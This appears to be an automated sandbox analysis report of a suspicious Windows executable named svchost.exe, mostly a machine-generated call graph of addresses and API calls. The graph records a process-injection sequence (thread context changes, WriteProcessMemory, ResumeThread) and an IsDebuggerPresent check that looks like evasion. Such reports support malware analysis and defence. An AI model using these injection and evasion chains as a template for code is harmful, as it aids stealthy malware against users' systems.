7ff60bfa1d88 19874->19958 19876 7ff60bf81da0 GetCurrentProcess DuplicateHandle 19878 7ff60bf81e08 GetCurrentProcess DuplicateHandle 19876->19878 19876->19879 19878->19879 19880 7ff60bf83bcc 19879->19880 20263 7ff60bf84368 19880->20263 19884 7ff60bf8209c CloseHandle 19883->19884 19885 7ff60bf820ae MapViewOfFile 19883->19885 19886 7ff60bf82134 19884->19886 19887 7ff60bf820da CloseHandle CloseHandle 19885->19887 19888 7ff60bf820f4 GetFileSize VirtualAlloc 19885->19888 19886->19669 19886->19670 19886->19683 19887->19886 19888->19886 19889 7ff60bf82138 UnmapViewOfFile CloseHandle 19888->19889 19889->19886 20280 7ff60bf82bec 19890->20280 19892 7ff60bf82e1d 19895 7ff60bf82f38 19892->19895 19893 7ff60bf82e08 19893->19892 19894 7ff60bf82f0b GetLastError 19893->19894 19894->19892 19896 7ff60bf82f87 19895->19896 19898 7ff60bf82f92 19896->19898 20372 7ff60bf81e8c GetFileSize SetFilePointer 19896->20372 19898->19679 19900 7ff60bf8302e wcsnlen 19899->19900 20376 7ff60bf82a40 19900->20376 19902 7ff60bf83084 19907 7ff60bf82174 19902->19907 19903 7ff60bf8307d 19903->19902 20381 7ff60bf81f38 19903->20381 19906 7ff60bf8310d ResumeThread 19906->19902 19908 7ff60bf8218c VirtualFree 19907->19908 19909 7ff60bf8218a 19907->19909 19908->19909 19909->19683 19915 7ff60bfa1590 19910->19915 19912 7ff60bf83ac0 19912->19849 19913 7ff60bf839c0 SysAllocString 19912->19913 19914 7ff60bf83a05 19913->19914 19914->19849 19918 7ff60bfa159b 19915->19918 19916 7ff60bfa244c malloc 68 API calls 19916->19918 19917 7ff60bfa15b4 19917->19912 19918->19916 19918->19917 19919 7ff60bfa3d88 _callnewh DecodePointer 19918->19919 19920 7ff60bfa15ba std::_Xbad_alloc 19918->19920 19919->19918 19925 7ff60bfa2504 19920->19925 19922 7ff60bfa15f8 19930 7ff60bfa2f2c 19922->19930 19924 7ff60bfa161a 19924->19912 19926 7ff60bfa2584 RtlPcToFileHeader 19925->19926 19927 7ff60bfa2574 19925->19927 19928 7ff60bfa25c4 RaiseException 19926->19928 19929 7ff60bfa25a9 19926->19929 19927->19926 19928->19922 19929->19928 19931 7ff60bfa3018 19930->19931 19932 7ff60bfa3030 19931->19932 19933 7ff60bfa240c free 68 API calls 19931->19933 19932->19924 19933->19932 19935 7ff60bf83e29 19934->19935 19937 7ff60bf83e36 19934->19937 19938 7ff60bfb00b0 19935->19938 19937->19851 19939 7ff60bfb00e2 WideCharToMultiByte 19938->19939 19948 7ff60bfb00db 19938->19948 19941 7ff60bfb012a GetLastError 19939->19941 19942 7ff60bfb0134 19939->19942 19941->19942 19943 7ff60bfa1590 std::_Facet_Register 70 API calls 19942->19943 19944 7ff60bfb014c 19943->19944 19945 7ff60bfb0154 WideCharToMultiByte 19944->19945 19944->19948 19946 7ff60bfb017d 19945->19946 19945->19948 19947 7ff60bfb0185 GetLastError 19946->19947 19947->19948 19948->19937 19950 7ff60bf83427 19949->19950 19952 7ff60bf83433 19949->19952 19951 7ff60bfa240c free 68 API calls 19950->19951 19951->19952 19953 7ff60bfa240c free 68 API calls 19952->19953 19954 7ff60bfa244c malloc 68 API calls 19952->19954 19955 7ff60bf834be 19952->19955 19957 7ff60bf81bbc 19952->19957 19953->19952 19954->19952 19956 7ff60bfa240c free 68 API calls 19955->19956 19956->19957 19957->19861 19957->19866 19959 7ff60bfa1db9 19958->19959 19960 7ff60bfa1d95 19958->19960 19975 7ff60bfa1ca4 19959->19975 19960->19959 19961 7ff60bfa1d9a 19960->19961 19962 7ff60bfa59a4 _errno 68 API calls 19961->19962 19965 7ff60bfa1d9f 19962->19965 19967 7ff60bfa47a0 _invalid_parameter_noinfo 16 API calls 19965->19967 19966 7ff60bfa1dfc 19968 7ff60bfa59a4 _errno 68 API calls 19966->19968 19969 7ff60bfa1daa 19967->19969 19970 7ff60bfa1e01 19968->19970 19969->19876 19972 7ff60bfa47a0 _invalid_parameter_noinfo 16 API calls 19970->19972 19971 7ff60bfa1e0c __ascii_stricmp 19971->19876 19972->19971 19973 7ff60bfa1e13 19973->19971 19974 7ff60bfa5484 75 API calls _tolower_l 19973->19974 19974->19973 19976 7ff60bfa1cba 19975->19976 19982 7ff60bfa1d1b 19975->19982 19983 7ff60bfa572c 19976->19983 19979 7ff60bfa1cf4 19979->19982 20002 7ff60bfa4ebc 19979->20002 19982->19966 19982->19973 19984 7ff60bfa5750 _getptd_noexit 68 API calls 19983->19984 19985 7ff60bfa5737 19984->19985 19986 7ff60bfa1cbf 19985->19986 19987 7ff60bfa3e20 _lock 68 API calls 19985->19987 19986->19979 19988 7ff60bfa4ac4 19986->19988 19987->19986 19989 7ff60bfa572c _getptd 68 API calls 19988->19989 19990 7ff60bfa4acf 19989->19990 19991 7ff60bfa4af8 19990->19991 19992 7ff60bfa4aea 19990->19992 19993 7ff60bfaac78 _lock 68 API calls 19991->19993 19994 7ff60bfa572c _getptd 68 API calls 19992->19994 19995 7ff60bfa4b02 19993->19995 19996 7ff60bfa4aef 19994->19996 20013 7ff60bfa4b3c 19995->20013 20000 7ff60bfa4b30 19996->20000 20001 7ff60bfa3e20 _lock 68 API calls 19996->20001 20000->19979 20001->20000 20003 7ff60bfa572c _getptd 68 API calls 20002->20003 20004 7ff60bfa4ecb 20003->20004 20005 7ff60bfaac78 _lock 68 API calls 20004->20005 20006 7ff60bfa4ee6 20004->20006 20011 7ff60bfa4ef9 20005->20011 20008 7ff60bfa4f68 20006->20008 20010 7ff60bfa3e20 _lock 68 API calls 20006->20010 20007 7ff60bfa4f2f 20262 7ff60bfaae60 LeaveCriticalSection 20007->20262 20008->19982 20010->20008 20011->20007 20012 7ff60bfa240c free 68 API calls 20011->20012 20012->20007 20014 7ff60bfa4b16 20013->20014 20015 7ff60bfa4b4e _wsetlocale _copytlocinfo_nolock 20013->20015 20017 7ff60bfaae60 LeaveCriticalSection 20014->20017 20015->20014 20018 7ff60bfa4888 20015->20018 20019 7ff60bfa4924 20018->20019 20022 7ff60bfa48ab 20018->20022 20020 7ff60bfa4977 20019->20020 20023 7ff60bfa240c free 68 API calls 20019->20023 20021 7ff60bfa49a4 20020->20021 20086 7ff60bfaba30 20020->20086 20030 7ff60bfa4a02 20021->20030 20045 7ff60bfa240c 68 API calls free 20021->20045 20022->20019 20032 7ff60bfa240c free 68 API calls 20022->20032 20034 7ff60bfa48ea 20022->20034 20025 7ff60bfa4948 20023->20025 20027 7ff60bfa240c free 68 API calls 20025->20027 20033 7ff60bfa495c 20027->20033 20028 7ff60bfa490c 20029 7ff60bfa240c free 68 API calls 20028->20029 20036 7ff60bfa4918 20029->20036 20031 7ff60bfa240c free 68 API calls 20031->20021 20037 7ff60bfa48de 20032->20037 20038 7ff60bfa240c free 68 API calls 20033->20038 20034->20028 20035 7ff60bfa240c free 68 API calls 20034->20035 20039 7ff60bfa4900 20035->20039 20040 7ff60bfa240c free 68 API calls 20036->20040 20046 7ff60bfab0ac 20037->20046 20042 7ff60bfa496b 20038->20042 20074 7ff60bfab6d8 20039->20074 20040->20019 20043 7ff60bfa240c free 68 API calls 20042->20043 20043->20020 20045->20021 20047 7ff60bfab0b5 20046->20047 20072 7ff60bfab1b0 20046->20072 20048 7ff60bfab0cf 20047->20048 20049 7ff60bfa240c free 68 API calls 20047->20049 20050 7ff60bfab0e1 20048->20050 20052 7ff60bfa240c free 68 API calls 20048->20052 20049->20048 20051 7ff60bfab0f3 20050->20051 20053 7ff60bfa240c free 68 API calls 20050->20053 20054 7ff60bfab105 20051->20054 20055 7ff60bfa240c free 68 API calls 20051->20055 20052->20050 20053->20051 20056 7ff60bfab117 20054->20056 20057 7ff60bfa240c free 68 API calls 20054->20057 20055->20054 20058 7ff60bfab129 20056->20058 20059 7ff60bfa240c free 68 API calls 20056->20059 20057->20056 20060 7ff60bfab13b 20058->20060 20061 7ff60bfa240c free 68 API calls 20058->20061 20059->20058 20062 7ff60bfa240c free 68 API calls 20060->20062 20064 7ff60bfab14d 20060->20064 20061->20060 20062->20064 20063 7ff60bfab15f 20066 7ff60bfab171 20063->20066 20067 7ff60bfa240c free 68 API calls 20063->20067 20064->20063 20065 7ff60bfa240c free 68 API calls 20064->20065 20065->20063 20068 7ff60bfab186 20066->20068 20069 7ff60bfa240c free 68 API calls 20066->20069 20067->20066 20070 7ff60bfab19b 20068->20070 20071 7ff60bfa240c free 68 API calls 20068->20071 20069->20068 20070->20072 20073 7ff60bfa240c free 68 API calls 20070->20073 20071->20070 20072->20034 20073->20072 20075 7ff60bfab6dd 20074->20075 20084 7ff60bfab73e 20074->20084 20076 7ff60bfab6f6 20075->20076 20077 7ff60bfa240c free 68 API calls 20075->20077 20078 7ff60bfa240c free 68 API calls 20076->20078 20079 7ff60bfab708 20076->20079 20077->20076 20078->20079 20080 7ff60bfab71a 20079->20080 20081 7ff60bfa240c free 68 API calls 20079->20081 20082 7ff60bfab72c 20080->20082 20083 7ff60bfa240c free 68 API calls 20080->20083 20081->20080 20082->20084 20085 7ff60bfa240c free 68 API calls 20082->20085 20083->20082 20084->20028 20085->20084 20087 7ff60bfa4998 20086->20087 20088 7ff60bfaba39 20086->20088 20087->20031 20089 7ff60bfa240c free 68 API calls 20088->20089 20090 7ff60bfaba4a 20089->20090 20091 7ff60bfa240c free 68 API calls 20090->20091 20092 7ff60bfaba53 20091->20092 20093 7ff60bfa240c free 68 API calls 20092->20093 20094 7ff60bfaba5c 20093->20094 20095 7ff60bfa240c free 68 API calls 20094->20095 20096 7ff60bfaba65 20095->20096 20097 7ff60bfa240c free 68 API calls 20096->20097 20098 7ff60bfaba6e 20097->20098 20099 7ff60bfa240c free 68 API calls 20098->20099 20100 7ff60bfaba77 20099->20100 20101 7ff60bfa240c free 68 API calls 20100->20101 20102 7ff60bfaba7f 20101->20102 20103 7ff60bfa240c free 68 API calls 20102->20103 20104 7ff60bfaba88 20103->20104 20105 7ff60bfa240c free 68 API calls 20104->20105 20106 7ff60bfaba91 20105->20106 20107 7ff60bfa240c free 68 API calls 20106->20107 20108 7ff60bfaba9a 20107->20108 20109 7ff60bfa240c free 68 API calls 20108->20109 20110 7ff60bfabaa3 20109->20110 20111 7ff60bfa240c free 68 API calls 20110->20111 20112 7ff60bfabaac 20111->20112 20113 7ff60bfa240c free 68 API calls 20112->20113 20114 7ff60bfabab5 20113->20114 20115 7ff60bfa240c free 68 API calls 20114->20115 20116 7ff60bfababe 20115->20116 20117 7ff60bfa240c free 68 API calls 20116->20117 20118 7ff60bfabac7 20117->20118 20119 7ff60bfa240c free 68 API calls 20118->20119 20120 7ff60bfabad0 20119->20120 20121 7ff60bfa240c free 68 API calls 20120->20121 20122 7ff60bfabadc 20121->20122 20123 7ff60bfa240c free 68 API calls 20122->20123 20124 7ff60bfabae8 20123->20124 20125 7ff60bfa240c free 68 API calls 20124->20125 20126 7ff60bfabaf4 20125->20126 20127 7ff60bfa240c free 68 API calls 20126->20127 20128 7ff60bfabb00 20127->20128 20129 7ff60bfa240c free 68 API calls 20128->20129 20130 7ff60bfabb0c 20129->20130 20131 7ff60bfa240c free 68 API calls 20130->20131 20132 7ff60bfabb18 20131->20132 20133 7ff60bfa240c free 68 API calls 20132->20133 20134 7ff60bfabb24 20133->20134 20135 7ff60bfa240c free 68 API calls 20134->20135 20136 7ff60bfabb30 20135->20136 20137 7ff60bfa240c free 68 API calls 20136->20137 20138 7ff60bfabb3c 20137->20138 20139 7ff60bfa240c free 68 API calls 20138->20139 20140 7ff60bfabb48 20139->20140 20141 7ff60bfa240c free 68 API calls 20140->20141 20142 7ff60bfabb54 20141->20142 20143 7ff60bfa240c free 68 API calls 20142->20143 20144 7ff60bfabb60 20143->20144 20145 7ff60bfa240c free 68 API calls 20144->20145 20146 7ff60bfabb6c 20145->20146 20147 7ff60bfa240c free 68 API calls 20146->20147 20148 7ff60bfabb78 20147->20148 20149 7ff60bfa240c free 68 API calls 20148->20149 20150 7ff60bfabb84 20149->20150 20151 7ff60bfa240c free 68 API calls 20150->20151 20152 7ff60bfabb90 20151->20152 20153 7ff60bfa240c free 68 API calls 20152->20153 20154 7ff60bfabb9c 20153->20154 20155 7ff60bfa240c free 68 API calls 20154->20155 20156 7ff60bfabba8 20155->20156 20157 7ff60bfa240c free 68 API calls 20156->20157 20158 7ff60bfabbb4 20157->20158 20159 7ff60bfa240c free 68 API calls 20158->20159 20160 7ff60bfabbc0 20159->20160 20161 7ff60bfa240c free 68 API calls 20160->20161 20162 7ff60bfabbcc 20161->20162 20163 7ff60bfa240c free 68 API calls 20162->20163 20164 7ff60bfabbd8 20163->20164 20165 7ff60bfa240c free 68 API calls 20164->20165 20166 7ff60bfabbe4 20165->20166 20167 7ff60bfa240c free 68 API calls 20166->20167 20168 7ff60bfabbf0 20167->20168 20169 7ff60bfa240c free 68 API calls 20168->20169 20170 7ff60bfabbfc 20169->20170 20171 7ff60bfa240c free 68 API calls 20170->20171 20172 7ff60bfabc08 20171->20172 20173 7ff60bfa240c free 68 API calls 20172->20173 20174 7ff60bfabc14 20173->20174 20175 7ff60bfa240c free 68 API calls 20174->20175 20176 7ff60bfabc20 20175->20176 20177 7ff60bfa240c free 68 API calls 20176->20177 20178 7ff60bfabc2c 20177->20178 20179 7ff60bfa240c free 68 API calls 20178->20179 20180 7ff60bfabc38 20179->20180 20181 7ff60bfa240c free 68 API calls 20180->20181 20182 7ff60bfabc44 20181->20182 20183 7ff60bfa240c free 68 API calls 20182->20183 20184 7ff60bfabc50 20183->20184 20185 7ff60bfa240c free 68 API calls 20184->20185 20186 7ff60bfabc5c 20185->20186 20187 7ff60bfa240c free 68 API calls 20186->20187 20188 7ff60bfabc68 20187->20188 20189 7ff60bfa240c free 68 API calls 20188->20189 20190 7ff60bfabc74 20189->20190 20191 7ff60bfa240c free 68 API calls 20190->20191 20192 7ff60bfabc80 20191->20192 20193 7ff60bfa240c free 68 API calls 20192->20193 20194 7ff60bfabc8c 20193->20194 20195 7ff60bfa240c free 68 API calls 20194->20195 20196 7ff60bfabc98 20195->20196 20197 7ff60bfa240c free 68 API calls 20196->20197 20198 7ff60bfabca4 20197->20198 20199 7ff60bfa240c free 68 API calls 20198->20199 20200 7ff60bfabcb0 20199->20200 20201 7ff60bfa240c free 68 API calls 20200->20201 20202 7ff60bfabcbc 20201->20202 20203 7ff60bfa240c free 68 API calls 20202->20203 20204 7ff60bfabcc8 20203->20204 20205 7ff60bfa240c free 68 API calls 20204->20205 20206 7ff60bfabcd4 20205->20206 20207 7ff60bfa240c free 68 API calls 20206->20207 20208 7ff60bfabce0 20207->20208 20209 7ff60bfa240c free 68 API calls 20208->20209 20210 7ff60bfabcec 20209->20210 20211 7ff60bfa240c free 68 API calls 20210->20211 20212 7ff60bfabcf8 20211->20212 20213 7ff60bfa240c free 68 API calls 20212->20213 20214 7ff60bfabd04 20213->20214 20215 7ff60bfa240c free 68 API calls 20214->20215 20216 7ff60bfabd10 20215->20216 20217 7ff60bfa240c free 68 API calls 20216->20217 20218 7ff60bfabd1c 20217->20218 20219 7ff60bfa240c free 68 API calls 20218->20219 20220 7ff60bfabd28 20219->20220 20221 7ff60bfa240c free 68 API calls 20220->20221 20222 7ff60bfabd34 20221->20222 20223 7ff60bfa240c free 68 API calls 20222->20223 20224 7ff60bfabd40 20223->20224 20225 7ff60bfa240c free 68 API calls 20224->20225 20226 7ff60bfabd4c 20225->20226 20227 7ff60bfa240c free 68 API calls 20226->20227 20228 7ff60bfabd58 20227->20228 20229 7ff60bfa240c free 68 API calls 20228->20229 20230 7ff60bfabd64 20229->20230 20231 7ff60bfa240c free 68 API calls 20230->20231 20232 7ff60bfabd70 20231->20232 20233 7ff60bfa240c free 68 API calls 20232->20233 20234 7ff60bfabd7c 20233->20234 20235 7ff60bfa240c free 68 API calls 20234->20235 20236 7ff60bfabd88 20235->20236 20237 7ff60bfa240c free 68 API calls 20236->20237 20238 7ff60bfabd94 20237->20238 20239 7ff60bfa240c free 68 API calls 20238->20239 20240 7ff60bfabda0 20239->20240 20241 7ff60bfa240c free 68 API calls 20240->20241 20242 7ff60bfabdac 20241->20242 20243 7ff60bfa240c free 68 API calls 20242->20243 20244 7ff60bfabdb8 20243->20244 20245 7ff60bfa240c free 68 API calls 20244->20245 20246 7ff60bfabdc4 20245->20246 20247 7ff60bfa240c free 68 API calls 20246->20247 20248 7ff60bfabdd0 20247->20248 20249 7ff60bfa240c free 68 API calls 20248->20249 20250 7ff60bfabddc 20249->20250 20251 7ff60bfa240c free 68 API calls 20250->20251 20252 7ff60bfabde8 20251->20252 20253 7ff60bfa240c free 68 API calls 20252->20253 20254 7ff60bfabdf4 20253->20254 20255 7ff60bfa240c free 68 API calls 20254->20255 20256 7ff60bfabe00 20255->20256 20257 7ff60bfa240c free 68 API calls 20256->20257 20258 7ff60bfabe0c 20257->20258 20259 7ff60bfa240c free 68 API calls 20258->20259 20260 7ff60bfabe18 20259->20260 20261 7ff60bfa240c free 68 API calls 20260->20261 20261->20087 20264 7ff60bf8437c 20263->20264 20265 7ff60bf83bdf 20263->20265 20267 7ff60bf83e50 20264->20267 20265->19662 20268 7ff60bf83ea5 20267->20268 20269 7ff60bf83e7a 20267->20269 20268->20265 20269->20268 20271 7ff60bf83d34 20269->20271 20274 7ff60bf83b84 20271->20274 20273 7ff60bf83d4b 20273->20268 20277 7ff60bf84304 20274->20277 20276 7ff60bf83b97 20276->20273 20278 7ff60bf84318 SysFreeString 20277->20278 20279 7ff60bf84332 20277->20279 20278->20279 20279->20276 20285 7ff60bf83970 20280->20285 20284 7ff60bf82c22 20284->19893 20286 7ff60bf83988 construct shared_ptr type_info::_name_internal_method 20285->20286 20292 7ff60bf84e20 20286->20292 20289 7ff60bf83d10 20351 7ff60bf84a18 20289->20351 20293 7ff60bf84e38 type_info::_name_internal_method 20292->20293 20296 7ff60bf84e50 20293->20296 20295 7ff60bf82c0d 20295->20289 20297 7ff60bf84e72 type_info::_name_internal_method 20296->20297 20298 7ff60bf84eaa 20297->20298 20299 7ff60bf84e79 type_info::_name_internal_method 20297->20299 20314 7ff60bf8447c 20298->20314 20303 7ff60bf84d1c 20299->20303 20302 7ff60bf84ea8 type_info::_name_internal_method char_traits 20302->20295 20304 7ff60bf84d3e type_info::_name_internal_method 20303->20304 20306 7ff60bf84d4f type_info::_name_internal_method 20304->20306 20320 7ff60bf8485c 20304->20320 20307 7ff60bf84db5 20306->20307 20308 7ff60bf84d85 20306->20308 20310 7ff60bf8447c type_info::_name_internal_method 70 API calls 20307->20310 20323 7ff60bf85330 20308->20323 20313 7ff60bf84db3 type_info::_name_internal_method char_traits 20310->20313 20311 7ff60bf84da2 20327 7ff60bf8525c 20311->20327 20313->20302 20315 7ff60bf84499 type_info::_name_internal_method 20314->20315 20316 7ff60bf844aa 20315->20316 20336 7ff60bf84840 20315->20336 20319 7ff60bf844d2 type_info::_name_internal_method 20316->20319 20339 7ff60bf8409c 20316->20339 20319->20302 20331 7ff60bfb04f8 20320->20331 20324 7ff60bf85358 type_info::_name_internal_method 20323->20324 20325 7ff60bf8534e 20323->20325 20324->20311 20326 7ff60bf8485c _Mtx_guard::~_Mtx_guard 70 API calls 20325->20326 20326->20324 20328 7ff60bf8527f 20327->20328 20330 7ff60bf85289 type_info::_name_internal_method char_traits 20327->20330 20329 7ff60bf8485c _Mtx_guard::~_Mtx_guard 70 API calls 20328->20329 20329->20330 20330->20313 20332 7ff60bfa2eb4 std::exception::exception 68 API calls 20331->20332 20333 7ff60bfb0510 20332->20333 20334 7ff60bfa2504 _CxxThrowException RtlPcToFileHeader RaiseException 20333->20334 20335 7ff60bfb052d 20334->20335 20343 7ff60bfb04c0 20336->20343 20340 7ff60bf840d6 _Ucopy type_info::_name_internal_method 20339->20340 20348 7ff60bf8489c 20340->20348 20342 7ff60bf841d0 construct _Ucopy type_info::_name_internal_method char_traits 20342->20319 20344 7ff60bfa2eb4 std::exception::exception 68 API calls 20343->20344 20345 7ff60bfb04d8 20344->20345 20346 7ff60bfa2504 _CxxThrowException RtlPcToFileHeader RaiseException 20345->20346 20347 7ff60bfb04f5 20346->20347 20349 7ff60bf848e0 _DebugMallocator 70 API calls 20348->20349 20350 7ff60bf848b9 20349->20350 20350->20342 20352 7ff60bf84a30 type_info::_name_internal_method 20351->20352 20355 7ff60bf84a48 20352->20355 20354 7ff60bf83d2d 20354->20284 20356 7ff60bf84a6a type_info::_name_internal_method 20355->20356 20357 7ff60bf84aa5 20356->20357 20358 7ff60bf84a71 type_info::_name_internal_method 20356->20358 20359 7ff60bf84acc 20357->20359 20360 7ff60bf84840 _Mtx_guard::~_Mtx_guard 70 API calls 20357->20360 20364 7ff60bf84900 20358->20364 20362 7ff60bf8447c type_info::_name_internal_method 70 API calls 20359->20362 20363 7ff60bf84aa0 type_info::_name_internal_method char_traits 20359->20363 20360->20359 20362->20363 20363->20354 20365 7ff60bf84922 type_info::_name_internal_method 20364->20365 20366 7ff60bf8485c _Mtx_guard::~_Mtx_guard 70 API calls 20365->20366 20367 7ff60bf84933 type_info::_name_internal_method 20365->20367 20366->20367 20368 7ff60bf84984 20367->20368 20369 7ff60bf84840 _Mtx_guard::~_Mtx_guard 70 API calls 20367->20369 20370 7ff60bf8447c type_info::_name_internal_method 70 API calls 20368->20370 20371 7ff60bf849b1 type_info::_name_internal_method char_traits 20368->20371 20369->20368 20370->20371 20371->20363 20373 7ff60bf81ed7 20372->20373 20374 7ff60bf81f2d 20373->20374 20375 7ff60bf81ee1 WriteFile SetFilePointer 20373->20375 20374->19898 20375->20373 20389 7ff60bf81600 GetModuleHandleA GetProcAddress 20376->20389 20379 7ff60bf82a67 lstrcatW 20380 7ff60bf82a60 20379->20380 20380->19903 20382 7ff60bf81f5d 20381->20382 20391 7ff60bf82838 20382->20391 20385 7ff60bf81f96 20385->19902 20385->19906 20387 7ff60bf81fb1 20387->20385 20388 7ff60bf82001 WriteProcessMemory 20387->20388 20388->20385 20390 7ff60bf81639 20389->20390 20390->20379 20390->20380 20392 7ff60bf8285b Wow64GetThreadContext 20391->20392 20393 7ff60bf828d9 GetThreadContext 20391->20393 20394 7ff60bf81f92 20392->20394 20395 7ff60bf828af Wow64SetThreadContext 20392->20395 20393->20394 20396 7ff60bf8293a SetThreadContext 20393->20396 20394->20385 20397 7ff60bf82974 20394->20397 20395->20394 20396->20394 20398 7ff60bf829d2 GetThreadContext 20397->20398 20399 7ff60bf82991 Wow64GetThreadContext 20397->20399 20400 7ff60bf829c5 20398->20400 20399->20400 20400->20387 20402 7ff60bfa9eb0 20401->20402 20403 7ff60bfa384e 20402->20403 20404 7ff60bfa59a4 _errno 68 API calls 20402->20404 20403->19164 20403->19166 20405 7ff60bfa9ed5 20404->20405 20406 7ff60bfa47a0 _invalid_parameter_noinfo 16 API calls 20405->20406 20406->20403 20411 7ff60bfaa3e1 20407->20411 20408 7ff60bfaa3e6 20409 7ff60bfa39d5 20408->20409 20410 7ff60bfa59a4 _errno 68 API calls 20408->20410 20409->19191 20409->19196 20415 7ff60bfaa410 20410->20415 20411->20408 20411->20409 20413 7ff60bfaa424 20411->20413 20412 7ff60bfa47a0 _invalid_parameter_noinfo 16 API calls 20412->20409 20413->20409 20414 7ff60bfa59a4 _errno 68 API calls 20413->20414 20414->20415 20415->20412 20417 7ff60bfaa2d5 20416->20417 20419 7ff60bfaa2df 20416->20419 20417->20419 20423 7ff60bfaa316 20417->20423 20418 7ff60bfa59a4 _errno 68 API calls 20420 7ff60bfaa2e8 20418->20420 20419->20418 20421 7ff60bfa47a0 _invalid_parameter_noinfo 16 API calls 20420->20421 20422 7ff60bfa39ef 20421->20422 20422->19198 20422->19200 20423->20422 20424 7ff60bfa59a4 _errno 68 API calls 20423->20424 20424->20420 20459 7ff60bfaa1c4 20425->20459 20428 7ff60bfaa4e9 LoadLibraryExW 20432 7ff60bfaa52e GetProcAddress 20428->20432 20433 7ff60bfaa506 GetLastError 20428->20433 20429 7ff60bfaa5dc IsDebuggerPresent 20430 7ff60bfaa603 20429->20430 20431 7ff60bfaa5e6 20429->20431 20434 7ff60bfaa5f4 20430->20434 20436 7ff60bfaa608 DecodePointer 20430->20436 20431->20434 20435 7ff60bfaa5eb OutputDebugStringW 20431->20435 20437 7ff60bfaa5f9 20432->20437 20439 7ff60bfaa547 7 API calls 20432->20439 20433->20437 20438 7ff60bfaa515 LoadLibraryW 20433->20438 20434->20437 20441 7ff60bfaa652 20434->20441 20445 7ff60bfaa634 DecodePointer DecodePointer 20434->20445 20435->20434 20436->20437 20442 7ff60bfa6bb0 _call_reportfault 9 API calls 20437->20442 20438->20432 20438->20437 20439->20429 20440 7ff60bfaa5bc GetProcAddress EncodePointer 20439->20440 20440->20429 20443 7ff60bfaa6ce DecodePointer 20441->20443 20444 7ff60bfaa69a DecodePointer 20441->20444 20449 7ff60bfaa688 20441->20449 20446 7ff60bfaa6ff 20442->20446 20443->20437 20444->20443 20447 7ff60bfaa6a5 20444->20447 20445->20441 20446->19209 20447->20443 20448 7ff60bfaa6bb DecodePointer 20447->20448 20448->20443 20448->20449 20449->20443 20452 7ff60bfa6bb9 20450->20452 20451 7ff60bfa3740 20451->19210 20452->20451 20453 7ff60bfa8460 IsProcessorFeaturePresent 20452->20453 20454 7ff60bfa8477 20453->20454 20462 7ff60bfaa104 RtlCaptureContext 20454->20462 20460 7ff60bfaa1d6 GetModuleHandleW GetProcAddress 20459->20460 20461 7ff60bfaa1fc 20459->20461 20460->20461 20461->20428 20461->20429 20463 7ff60bfaa11e RtlLookupFunctionEntry 20462->20463 20464 7ff60bfaa134 RtlVirtualUnwind 20463->20464 20465 7ff60bfa848a 20463->20465 20464->20463 20464->20465 20466 7ff60bfa8414 IsDebuggerPresent 20465->20466 20467 7ff60bfa8433 _call_reportfault 20466->20467 20471 7ff60bfaa24c SetUnhandledExceptionFilter UnhandledExceptionFilter 20467->20471 20473 7ff60bfa3dfb ExitProcess 20472->20473 20474 7ff60bfa3de4 GetProcAddress 20472->20474 20474->20473 20476 7ff60bfaac78 _lock 60 API calls 20475->20476 20477 7ff60bfa4022 20476->20477 20478 7ff60bfa4110 doexit 20477->20478 20479 7ff60bfa4049 DecodePointer 20477->20479 20480 7ff60bfa4146 20478->20480 20492 7ff60bfaae60 LeaveCriticalSection 20478->20492 20479->20478 20481 7ff60bfa4067 DecodePointer 20479->20481 20487 7ff60bfa3e45 20480->20487 20493 7ff60bfaae60 LeaveCriticalSection 20480->20493 20484 7ff60bfa408c 20481->20484 20484->20478 20486 7ff60bfa409a EncodePointer 20484->20486 20490 7ff60bfa40ae DecodePointer EncodePointer 20484->20490 20486->20484 20491 7ff60bfa40c7 DecodePointer DecodePointer 20490->20491 20491->20484

                                                                                        Executed Functions

                                                                                        Function 00007FF60BF9FBA0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 111COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                        • String ID: GqgWzd$GqgWzd$svchost.exe
                                                                                        • API String ID: 613740775-3706196489
                                                                                        • Opcode ID: 4c5e5395f8df4162c819ca1ad9a9c7c381164b5cf8947f2502796a3ed018fcac
                                                                                        • Instruction ID: 91d2d2b184a18307d0a789970ebf7f55743a777cdc36a8a095e2ccbd3efb8823
                                                                                        • Opcode Fuzzy Hash: 4c5e5395f8df4162c819ca1ad9a9c7c381164b5cf8947f2502796a3ed018fcac
                                                                                        • Instruction Fuzzy Hash: E951E57190C64292E768AF31E9157AA26A1EF8D308F60C53AE58FC75B5CF3DE149CA40
                                                                                        Function 00007FF60BFA060C Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
